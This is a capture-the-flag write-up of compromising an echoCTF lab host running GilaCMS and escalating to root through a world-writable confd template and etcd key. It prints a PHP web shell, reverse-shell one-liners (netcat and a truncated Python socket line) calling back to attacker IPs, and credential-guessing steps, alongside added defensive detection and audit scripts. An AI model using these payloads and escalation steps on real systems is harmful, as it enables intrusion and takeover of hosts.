Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.32
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat nmap/allports.nmap
# Nmap 7.91 scan initiated Sat Dec 4 12:57:02 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.32
Increasing send delay for 10.0.100.32 from 0 to 5 due to 79 out of 261 dropped probes since last increase.
Warning: 10.0.100.32 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.32 from 640 to 1000 due to 172 out of 573 dropped probes since last increase.
Nmap scan report for 10.0.100.32
Host is up (0.16s latency).
Not shown: 41913 closed ports, 23621 filtered ports
PORT   STATE SERVICE
80/tcp open  http
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec 4 12:58:07 2021 -- 1 IP address (1 host up) scanned in 65.04 seconds
Default Script/Service Detection.
nmap -sC -sV -oA nmap/normal -p 80 10.0.100.32
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat nmap/normal.nmap
# Nmap 7.91 scan initiated Sat Dec 4 12:57:17 2021 as: nmap -sC -sV -oA nmap/normal -p 80 10.0.100.32
Nmap scan report for 10.0.100.32
Host is up (0.20s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 4 12:57:31 2021 -- 1 IP address (1 host up) scanned in 13.72 seconds
Seems we are dealing with HTTP only, which is cool, lol, so I can show off some new tools I found interesting from echotrust.
Without too much talk, let's jump in. Now let's check what we have on port 80.
lynx http://10.0.100.32/
Lynx
Lynx is a terminal-based web browser available for all Linux distributions. It renders the page as plain text in the terminal. It is a classic non-graphical text-mode browser, and because it does not load images or multimedia content it is fast compared to other browsers.
Cool, right? Yes, I know. So we know we are dealing with GilaCMS.
I looked around to see if I could get the exact version, but nothing: it was well hidden, I guess, or removed. Let's see if I can guess the admin page.
lynx http://10.0.100.32/gila/admin
Boom, seems we are right. Now let's hit the browser.
But man, seems we need credentials. I tried all the default ones but none worked, so we get a hint; let's read it.
There is a need to brute force http://pcprincipal.echocity-f.com/ for username and password, but it should be easy to find in the 3rd try. The domain you're going to need is @pcprincipal.echocity-f.com and the password is given to you on the frontpage as a domain...
Now it's getting interesting. So we now know the username is admin@pcprincipal.echocity-f.com,
and the password we should be able to guess.
Mama, we are in, and guess what, we have the version. OK, there should be a way to upload a shell and get RCE.
Click on Content > File Manager.
We have the config.php file, but it's not that helpful. Let's try uploading a PHP file and see.
Bounced back, hmmm, seems we have no permission to upload a file there. Let's find a place we can abuse to upload our malicious file.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ vi shell.php
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/pcprincipal]
└─$ cat shell.php
<?php system ($_GET['cmd']) ?>
Now we just need a place to upload it. Looking through the folders, I was able to upload it into the tmp folder, which is cool.
Now let's try to access it from outside, but man, I got 403 Forbidden.
Let's see if I can modify the .htaccess or delete it. Trying to edit: no luck, but delete: yes, luck, lol. The .htaccess that caused the 403 sits in a folder the web user can already write to, so nothing stops it from being removed.
Deleted. Now let's try to access it.
Boom, we can execute commands on the remote host. Now let's get a reverse shell back to our terminal.
Python one-liner reverse shell, or ncat:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.
OR
nc -e /bin/bash 10.10.10.0 1337
Now back to check our listener.
Now we have a shell, which is cool. Let's check the kernel version and some other stuff, and look for a way to escalate our privileges to root.
Quite alright, it's running Debian. Cool, let's check some running processes.
www-data@pcprincipal:/var/www/html/gila/tmp$ ps -auxwwwwww
USER       PID %CPU %MEM      VSZ   RSS TTY   STAT START TIME COMMAND
root         1  0.0  0.1     3732  2816 ?     Ss   Dec07 0:00 /bin/bash /entrypoint.sh tail -f /var/log/supervisor/supervisord.log /var/log/supervisor/confd.log
root        42  0.0  0.0     2384  1640 ?     S    Dec07 0:00 /bin/sh /usr/bin/mysqld_safe
mysql      159  0.0  3.9  1255420 81816 ?     Sl   Dec07 0:25 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=mysql --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root       160  0.0  0.0     4704  1072 ?     S    Dec07 0:00 logger -t mysqld -p daemon error
root       234  0.0  0.3    15848  6960 ?     Ss   Dec07 0:00 /usr/sbin/sshd
root       237  0.0  0.1     8492  3108 ?     Ss   Dec07 0:00 tmux new -d -s 0 /usr/bin/etcd
root       238  0.2  1.1 11201756 24300 pts/0 Ssl+ Dec07 2:47 /usr/bin/etcd
root       284  0.0  0.1     3780  2920 pts/1 Ss+  Dec07 0:00 /bin/bash /usr/local/bin/etcd-feeder.sh
root       318  0.0  1.0   215060 21400 ?     Ss   Dec07 0:02 /usr/sbin/apache2 -k start
www-data   321  0.0  0.7   215400 16208 ?     S    Dec07 0:00 /usr/sbin/apache2 -k start
www-data   322  0.0  0.7   215304 15844 ?     S    Dec07 0:01 /usr/sbin/apache2 -k start
www-data   323  0.0  0.7   215404 16244 ?     S    Dec07 0:00 /usr/sbin/apache2 -k start
www-data   324  0.0  0.7   215400 15432 ?     S    Dec07 0:01 /usr/sbin/apache2 -k start
www-data   325  0.0  0.7   215400 16072 ?     S    Dec07 0:00 /usr/sbin/apache2 -k start
root       337  0.0  0.8    26752 16868 ?     Ss   Dec07 0:07 /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisor/supervisord.conf
root       339  0.0  0.0     2384   736 ?     S    Dec07 0:00 /bin/sh -c rm -f /etc/confd/conf.d/etsctf_authorized_keys.toml; install -o root -g root -m 0666 /etc/confd/conf.d/etsctf_authorized_keys.toml.bk /etc/confd/conf.d/etsctf_authorized_keys.toml; /work/src/github.com/kelseyhightower/confd/bin/confd
root       347  0.0  0.0     2324   724 ?     S    Dec07 0:02 tail -f /var/log/supervisor/supervisord.log /var/log/supervisor/confd.log
root       348  0.0  1.0   645516 21508 ?     Sl   Dec07 0:09 /work/src/github.com/kelseyhightower/confd/bin/confd
www-data  1643  0.0  0.7   215400 16308 ?     S    Dec07 0:01 /usr/sbin/apache2 -k start
www-data 10791  0.0  0.7   215400 15756 ?     S    11:06 0:00 /usr/sbin/apache2 -k start
www-data 12894  0.0  0.0     2384   736 ?     S    12:00 0:00 sh -c nc -e /bin/bash 10.10.0.186 1337
www-data 12895  0.0  0.1     3732  2668 ?     S    12:00 0:00 bash
www-data 12897  0.0  0.3    14064  8060 ?     S    12:00 0:00 python3 -c import pty; pty.spawn('/bin/bash')
www-data 12898  0.0  0.1     4092  3316 pts/2 Ss   12:00 0:00 /bin/bash
root     13006  0.0  0.0     2292   724 pts/1 S+   12:03 0:00 sleep 360
www-data 13155  0.0  0.1     7864  2812 pts/2 R+   12:07 0:00 ps -auxwwwwww
www-data@pcprincipal:/var/www/html/gila/tmp$
There's a strange process, confd; seems we need to focus on that.
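The listing above also shows what this intrusion looks like from the host's side: Apache workers running as www-data never normally spawn nc, a pty.spawn one-liner, or a bash attached to a pts. As an added example (my own code, not from the original post or from the challenge), here is a small detector that parses ps aux output and flags exactly those rows; the sample listing is a constructed trim of the one above.

```python
import re

# Trimmed copy of the ps listing above (constructed sample, not live data).
PS_SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 318 0.0 1.0 215060 21400 ? Ss Dec07 0:02 /usr/sbin/apache2 -k start
www-data 321 0.0 0.7 215400 16208 ? S Dec07 0:00 /usr/sbin/apache2 -k start
www-data 12894 0.0 0.0 2384 736 ? S 12:00 0:00 sh -c nc -e /bin/bash 10.10.0.186 1337
www-data 12895 0.0 0.1 3732 2668 ? S 12:00 0:00 bash
www-data 12897 0.0 0.3 14064 8060 ? S 12:00 0:00 python3 -c import pty; pty.spawn('/bin/bash')
www-data 12898 0.0 0.1 4092 3316 pts/2 Ss 12:00 0:00 /bin/bash
root 13006 0.0 0.0 2292 724 pts/1 S+ 12:03 0:00 sleep 360
"""

# Accounts that should only ever run web-server workers.
WEB_USERS = {"www-data", "apache", "nginx"}

# Command lines seen when a worker has been turned into an interactive shell.
SHELL_PATTERNS = [
    (re.compile(r"\bnc\b.*\s-e\s"), "netcat -e shell"),
    (re.compile(r"pty\.spawn\("), "python pty spawn (tty upgrade)"),
    (re.compile(r"socket\.socket\(.*\.connect\("), "python socket reverse shell"),
]

def parse_ps_line(line):
    """Split one `ps aux` row into its 11 columns; COMMAND keeps its spaces."""
    cols = line.split(None, 10)
    if len(cols) < 11:
        return None
    return {"user": cols[0], "pid": int(cols[1]), "tty": cols[6], "cmd": cols[10]}

def find_web_shells(ps_output):
    """Return (pid, reason) pairs for web-server processes that look like shells."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        proc = parse_ps_line(line)
        if proc is None or proc["user"] not in WEB_USERS:
            continue
        reasons = [why for pat, why in SHELL_PATTERNS if pat.search(proc["cmd"])]
        if proc["tty"] != "?":  # Apache workers never hold a terminal
            reasons.append("web user attached to " + proc["tty"])
        findings.extend((proc["pid"], why) for why in reasons)
    return findings

if __name__ == "__main__":
    for pid, why in find_web_shells(PS_SAMPLE):
        print(pid, why)
```

Feed it the output of `ps auxwww` from a cron job or an EDR script and the three rows the attacker left behind (12894, 12897, 12898) are the only hits.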
ETCD & CONFD
Confd is a lightweight configuration management tool. It queries etcd, feeds the values into its template engine to keep local configuration files up to date, and polls on an interval so that configuration changes are picked up and reloaded automatically.
The default configuration folder is /etc/confd, so let's change directory to it.
Seems etsctf_authorized_keys.toml is writable (the supervisor command in the ps listing installs it with mode 0666), so let's see what we have in it.
www-data@pcprincipal:/etc/confd/conf.d$ cat etsctf_authorized_keys.toml
[template]
uid = 1001
mode = "0400"
src = "authorized_keys.tmpl"
dest = "/home/ETSCTF/.ssh/authorized_keys"
keys = [
"/ETSCTF/authorized_keys",
]
www-data@pcprincipal:/etc/confd/conf.d$
We have uid, which is the user id (ETSCTF) we want the generated file to be owned by; a mode for its permissions; an src template; a destination file dest; and the keys that will be queried from etcd, I think.
I think this is our way to escalate. These two files (the toml resource and the authorized_keys.tmpl template) generate an authorized_keys file for the user ETSCTF from the value of the etcd key /ETSCTF/authorized_keys.
So the new plan is to change the toml file so that it writes the authorized_keys file for the user root instead.
www-data@pcprincipal:/etc/confd/conf.d$ cat etsctf_authorized_keys.toml
[template]
uid = 0
mode = "0644"
src = "authorized_keys.tmpl"
dest = "/root/.ssh/authorized_keys"
keys = [
"/ETSCTF/authorized_keys",
]
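What makes this work is that the resource file was installed world-writable (the -m 0666 in the ps listing) while confd itself runs as root, so whoever can write the toml chooses dest and uid, and the etcd endpoint on 127.0.0.1:2379 accepts writes from www-data without authentication. As an added example (my code, not confd's and not part of the challenge), here is an audit that reads a confd conf.d directory and flags resources that are writable or owned by non-root, that point at /root or an authorized_keys file, or that produce root-owned files; the two toml bodies are constructed copies of the ones on this page.

```python
import os
import re
import stat

# The confd resource as shown on the page, and the tampered version (constructed copies).
ORIGINAL_TOML = """\
[template]
uid = 1001
mode = "0400"
src = "authorized_keys.tmpl"
dest = "/home/ETSCTF/.ssh/authorized_keys"
keys = [
  "/ETSCTF/authorized_keys",
]
"""
TAMPERED_TOML = (ORIGINAL_TOML.replace("uid = 1001", "uid = 0")
                 .replace('"0400"', '"0644"')
                 .replace("/home/ETSCTF/.ssh", "/root/.ssh"))

# Destinations that hand out a login when root-run confd writes them.
SENSITIVE_DEST = re.compile(r"^/root/|/\.ssh/authorized_keys$")

def parse_template(text):
    """Read the flat key = value lines of a confd resource (assumption: no nested tables)."""
    pat = re.compile(r'^\s*(\w+)\s*=\s*"?([^"\[\n]+?)"?\s*$', re.M)
    return {m.group(1): m.group(2) for m in pat.finditer(text)}

def audit_resource(path, text, file_mode, owner_uid):
    """Return (path, reason) pairs explaining why this resource is an escalation path."""
    t, reasons = parse_template(text), []
    if owner_uid != 0:
        reasons.append("owned by uid %d, not root" % owner_uid)
    if file_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group/other (mode %04o): any local user can retarget dest" % (file_mode & 0o777))
    if SENSITIVE_DEST.search(t.get("dest", "")):
        reasons.append("dest %s grants a login if the etcd key is attacker-controlled" % t["dest"])
    if t.get("uid") == "0":
        reasons.append("generated file will be owned by root")
    return [(path, r) for r in reasons]

def audit_conf_dir(conf_dir):
    """Stat and audit every .toml resource under conf_dir (confd's default is /etc/confd/conf.d)."""
    findings = []
    for name in sorted(os.listdir(conf_dir)):
        if name.endswith(".toml"):
            p = os.path.join(conf_dir, name)
            st = os.stat(p)
            with open(p) as f:
                findings += audit_resource(p, f.read(), st.st_mode, st.st_uid)
    return findings
```

Run `audit_conf_dir("/etc/confd/conf.d")` as root on a host like this one and the 0666 resource is reported before anyone has to rewrite it.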
Now the next step is to generate an SSH key pair.
www-data@pcprincipal:/tmp$ cd /tmp
www-data@pcprincipal:/tmp$ mkdir .ssh
www-data@pcprincipal:/tmp$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/.ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/.ssh/id_rsa.
Your public key has been saved in /tmp/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:4/adt/ftoqKFT03my39IBGfIOX8Et0O5OV1d/+5JJIU www-data@pcprincipal.echocity-f.com
The key's randomart image is:
+---[RSA 2048]----+
| . o.o*|
| * =o*|
| E =*|
| ++=|
| S oo oo|
| . o = +. |
| + o o. o.|
| . =.o o=.=|
| ..o.*+oB*|
+----[SHA256]-----+
www-data@pcprincipal:/tmp$
Now let's set the public key in etcd with:
etcdctl set /ETSCTF/authorized_keys "$(</tmp/.ssh/id_rsa.pub)";
www-data@pcprincipal:/tmp$ etcdctl set /ETSCTF/authorized_keys "$(</tmp/.ssh/id_rsa.pub)";
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZM8jwVsQmpgDjoecnszJI6uji8aPI17AQx4y/TnuPfCP3z+fijaJYLYuyOKFZ+/ViZDnRY0m+/cFm8EBElpIFZhc4VeII23xjjqdhAoe+k90iFJ8ZJiyFb/8igw+fxw2796eaFEmCpkV8ct2BCiJ4KO9v4uWX2Fc+9pxDeR1rwfHYfokaqFL4Iz6oOLx0TmONGCFvoHcCTScTUvRiCY+mVj5QyXAcBTLA5ipXAVF4dOxxdyM/8NSwf4g4u4Y60uXE+HUAwH9jAETdz7p/KLdZbsXJcNgY5uNquGLtkIgr7CNiCkJNMfOrRf4XBBZMVYFiK4teec+PNN/oMFxflI1R www-data@pcprincipal.echocity-f.com
www-data@pcprincipal:/tmp$ cd .ssh
www-data@pcprincipal:/tmp/.ssh$ ls
id_rsa id_rsa.pub
www-data@pcprincipal:/tmp/.ssh$ chmod 600 id_rsa
Now let's try SSH with the private key to access the root user.
ssh -i id_rsa root@localhost
Do we have the SSH port open locally? Yes we do: sshd listens only on 127.0.0.1:22, which is why it never showed up in the nmap scan.
www-data@pcprincipal:/tmp/.ssh$ ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      127.0.0.11:41712   0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.11:45549   0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:22       0.0.0.0:*
tcp   LISTEN 0      80     127.0.0.1:3306     0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:2379     0.0.0.0:*
tcp   LISTEN 0      128    127.0.0.1:2380     0.0.0.0:*
www-data@pcprincipal:/tmp/.ssh$
Now let's hit it.
Boom, in and done.
Greetings from Muzec